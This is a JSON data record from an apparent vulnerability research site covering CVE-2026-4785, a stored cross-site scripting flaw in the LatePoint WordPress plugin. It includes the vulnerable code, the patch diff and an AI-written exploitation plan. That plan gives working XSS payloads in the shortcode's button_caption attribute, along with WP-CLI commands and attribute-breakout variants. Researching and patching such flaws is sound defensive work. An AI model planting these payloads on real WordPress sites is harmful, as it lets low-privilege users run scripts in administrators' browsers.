[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDtPqhwA5szbRUAIqKRGcQnC6CEuwZlbiSKQgU74TrLU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-4785","latepoint-authenticated-contributor-stored-cross-site-scripting-via-shortcode-2","LatePoint \u003C= 5.3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button_caption' parameter in the [latepoint_resources] shortcode in versions up to and including 5.3.0. This is due to insufficient output escaping when the 'items' parameter is set to 'bundles'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","latepoint",null,"\u003C=5.3.0","5.3.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 15:17:40","2026-04-08 03:36:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F55c5c094-69c0-4e2a-be0c-fab6f1039309?source=api-prod",1,[22,23,24],"latepoint.php","lib\u002Fhelpers\u002Fshortcodes_helper.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-4785 (LatePoint Stored XSS)\n\n## 1. Vulnerability Summary\nThe **LatePoint** plugin (up to version 5.3.0) contains a stored cross-site scripting (XSS) vulnerability within the `[latepoint_resources]` shortcode. The vulnerability is caused by insufficient output escaping of the `button_caption` attribute when the `items` attribute is set to `'bundles'`. While other item types (like services or agents) may be properly handled, the specific code path for rendering bundles directly concatenates the user-provided caption into the HTML response. This allows an authenticated user with at least **Contributor** privileges to inject malicious scripts into pages or posts.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress Post\u002FPage Editor (Gutenberg or Classic).\n- **Vulnerable Component**: Shortcode rendering engine for `[latepoint_resources]`.\n- **Vulnerable Parameter**: `button_caption`.\n- **Precondition**: `items=\"bundles\"`.\n- **Authentication Level**: Contributor+ (any role capable of creating or editing posts and using shortcodes).\n- **Injection Type**: Stored XSS. The payload is stored in the `post_content` and executed whenever the post is rendered for any visitor (including administrators).\n\n## 3. Code Flow\n1. **Entry Point**: A user with Contributor+ permissions saves a post containing the shortcode: `[latepoint_resources items=\"bundles\" button_caption=\"\u003Cscript>alert(1)\u003C\u002Fscript>\"]`.\n2. **Shortcode Registration**: In `latepoint.php`, the plugin initializes. The shortcode `latepoint_resources` is registered (typically in `lib\u002Fhelpers\u002Fshortcodes_helper.php`).\n3. **Execution Path**:\n    - When the page is viewed, WordPress calls `OsShortcodesHelper::shortcode_latepoint_resources($atts)`.\n    - `$atts` are parsed using `shortcode_atts`, where `button_caption` is assigned the user's malicious string.\n    - The code enters a `switch ( $atts['items'] )` block (found around line 159 in `lib\u002Fhelpers\u002Fshortcodes_helper.php`).\n    - It enters the `case 'bundles':` block.\n    - The plugin retrieves bundle records (likely using `OsBundleModel`).\n    - The code iterates through the bundles. For each bundle, it builds an HTML string for a \"Book Now\" button.\n    - **Sink**: The value of `$atts['button_caption']` is concatenated into the `$output` string without being passed through `esc_html()` or `esc_attr()`.\n4. **Output**: The rendered page contains the raw, unescaped HTML\u002FJavaScript from the `button_caption`.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a nonce** to exploit. \n- The exploit occurs during the standard rendering of a shortcode inside a post.\n- Shortcodes are rendered server-side during the `the_content` filter execution.\n- No AJAX requests or specialized REST endpoints are required to trigger the XSS; simply visiting the published post is sufficient.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor can execute JavaScript in the context of an Administrator.\n\n### Step 1: Prepare Environment\nEnsure at least one \"Bundle\" exists in LatePoint, otherwise the item loop in the shortcode may not execute, and the vulnerable code path won't be reached.\n\n### Step 2: Inject Shortcode (Contributor)\nAs a Contributor, create a new post with the malicious shortcode.\n\n**HTTP Request (via `http_request` \u002F Playwright):**\n- **Method**: POST\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fpost-new.php` (or use `wp-json\u002Fwp\u002Fv2\u002Fposts`)\n- **Headers**: \n    - `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body Parameters**:\n    - `post_title`: `XSS Test`\n    - `content`: `[latepoint_resources items=\"bundles\" button_caption='\u003Cimg src=x onerror=alert(\"XSS_SUCCESS\")>']`\n    - `status`: `publish` (or `pending` if Contributor cannot publish)\n\n### Step 3: Trigger Execution (Administrator)\nNavigate to the post as an Administrator.\n\n**Action**: Use `browser_navigate` to the URL of the created post.\n\n### Step 4: Capture Proof\nUse `browser_eval` to check if the payload executed.\n```javascript\n\u002F\u002F Check for evidence of execution (e.g., a global variable set by payload)\nwindow.XSS_EXECUTED === true \n```\n\n## 6. Test Data Setup\nTo ensure the `foreach` loop for bundles executes, we must use WP-CLI to inject a dummy bundle into the database.\n\n**WP-CLI Commands:**\n```bash\n# 1. Create a dummy service first (Bundles often require services)\nwp eval \"\n\\$service = new OsServiceModel();\n\\$service->name = 'Test Service';\n\\$service->save();\n\"\n\n# 2. Create a dummy bundle\n# LatePoint uses custom tables. We use the internal model to ensure correct DB state.\nwp eval \"\n\\$bundle = new OsBundleModel();\n\\$bundle->name = 'Test Bundle';\n\\$bundle->short_description = 'Description';\n\\$bundle->status = 'active';\n\\$bundle->save();\n\"\n\n# 3. Create a post as contributor\nwp post create --post_type=post --post_status=publish --post_author=$(wp user get contributor --field=ID) --post_content='[latepoint_resources items=\"bundles\" button_caption=\"\u003Cimg src=x onerror=\\\"window.XSS_EXECUTED=true;console.log(\\'XSS\\')\\\">\"]' --post_title='XSS Trigger'\n```\n\n## 7. Expected Results\n- When the page is rendered, the HTML source for the bundle item should contain:\n  `\u003Cdiv class=\"os-bundle-button\">\u003Cimg src=x onerror=\"...\">\u003C\u002Fdiv>` (exact structure may vary depending on LatePoint's bundle view template).\n- The `onerror` event will fire because the source `x` is invalid.\n- The JavaScript `window.XSS_EXECUTED=true` will execute in the browser.\n\n## 8. Verification Steps\n1. **Source Check**: \n   Perform an HTTP GET request to the post URL and check if the raw payload exists:\n   `grep -q 'onerror=\"window.XSS_EXECUTED=true\"'`\n2. **Database State**:\n   Verify the post content is stored correctly:\n   `wp post get \u003CID> --field=post_content`\n3. **Execution Confirmation**:\n   In the automated agent, use `browser_eval(\"window.XSS_EXECUTED\")` to return `true`.\n\n## 9. Alternative Approaches\nIf the `button_caption` is filtered by WordPress's `kses` on post save (unlikely for shortcode attributes), try encoding the payload:\n- **HTML Entities**: `button_caption=\"&lt;img src=x onerror=alert(1)&gt;\"` (The shortcode parser might decode this before passing to the callback).\n- **Attribute Breakout**: If the `button_caption` is placed inside an attribute like `value=\"...\"`, use: `button_caption='\">\u003Cscript>alert(1)\u003C\u002Fscript>'`.\n- **Different Items**: If `bundles` are disabled, check if the same lack of escaping exists in `items=\"agents\"` or `items=\"locations\"` by reviewing the logic in `lib\u002Fhelpers\u002Fshortcodes_helper.php` for those cases. Based on the vulnerability report, `bundles` is the confirmed sink.","The LatePoint plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [latepoint_resources] shortcode. Authenticated attackers with Contributor-level permissions or higher can inject malicious JavaScript into the 'button_caption' attribute, which is rendered without escaping when the shortcode is configured to display 'bundles'.","\u002F\u002F lib\u002Fhelpers\u002Fshortcodes_helper.php:268\n\t\t\t\t\t\t\u003C?php if ( $atts['hide_description'] !== 'yes' && $description = $bundle->short_description ) { ?>\n\t\t\t\t\t\t\t\u003Cdiv class=\"ri-description\">\u003C?php echo $description; ?>\u003C\u002Fdiv>\n\t\t\t\t\t\t\u003C?php } ?>\n\t\t\t\t\t\t\u003Cdiv class=\"ri-buttons \u003C?php echo esc_attr( $btn_wrapper_classes ) ?>\">\n\t\t\t\t\t\t\t\u003Ca href=\"#\" \u003C?php echo $data_atts ?>\n\t\t\t\t\t\t\t   class=\"latepoint-book-button os_trigger_booking latepoint-btn-block \u003C?php echo esc_attr( $btn_classes ); ?>\"\n\t\t\t\t\t\t\t   data-selected-bundle=\"\u003C?php echo $bundle->id; ?>\" >\n\t\t\t\t\t\t\t\t\u003C?php echo $atts['button_caption']; ?>\n\t\t\t\t\t\t\t\u003C\u002Fa>\n\t\t\t\t\t\t\u003C\u002Fdiv>","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flatepoint\u002F5.3.0\u002Flib\u002Fhelpers\u002Fshortcodes_helper.php\t2026-03-10 07:15:14.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Flatepoint\u002F5.3.1\u002Flib\u002Fhelpers\u002Fshortcodes_helper.php\t2026-03-26 07:35:32.000000000 +0000\n@@ -269,13 +269,13 @@\n \t\t\t\t\t\t\u003C?php } ?>\n \n \t\t\t\t\t\t\u003C?php if ( $atts['hide_description'] !== 'yes' && $description = $bundle->short_description ) { ?>\n-\t\t\t\t\t\t\t\u003Cdiv class=\"ri-description\">\u003C?php echo $description; ?>\u003C\u002Fdiv>\n+\t\t\t\t\t\t\t\u003Cdiv class=\"ri-description\">\u003C?php echo wp_kses_post( $description ); ?>\u003C\u002Fdiv>\n \t\t\t\t\t\t\u003C?php } ?>\n \t\t\t\t\t\t\u003Cdiv class=\"ri-buttons \u003C?php echo esc_attr( $btn_wrapper_classes ) ?>\">\n \t\t\t\t\t\t\t\u003Ca href=\"#\" \u003C?php echo $data_atts ?>\n \t\t\t\t\t\t\t   class=\"latepoint-book-button os_trigger_booking latepoint-btn-block \u003C?php echo esc_attr( $btn_classes ); ?>\"\n \t\t\t\t\t\t\t   data-selected-bundle=\"\u003C?php echo $bundle->id; ?>\" >\n-\t\t\t\t\t\t\t\t\u003C?php echo $atts['button_caption']; ?>\n+\t\t\t\t\t\t\t\t\u003C?php echo wp_kses_post( $atts['button_caption'] ); ?>\n \t\t\t\t\t\t\t\u003C\u002Fa>\n \t\t\t\t\t\t\u003C\u002Fdiv>\n \t\t\t\t\t\u003C\u002Fdiv>","To exploit this vulnerability, an attacker with at least Contributor-level access must create or edit a post and insert a `[latepoint_resources]` shortcode. The payload requires the `items` attribute to be set to `bundles` and the `button_caption` attribute to contain a malicious script (e.g., `button_caption=\"\u003Cimg src=x onerror=alert(1)>\"`). For the payload to fire, at least one bundle must exist in the LatePoint plugin so that the rendering loop for bundle items is executed. Once the post is saved and viewed by any user (including an administrator), the script in the button caption will execute in the victim's browser context.","gemini-3-flash-preview","2026-04-17 20:48:05","2026-04-17 20:48:39",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","5.3.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags\u002F5.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatepoint.5.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags\u002F5.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatepoint.5.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags"]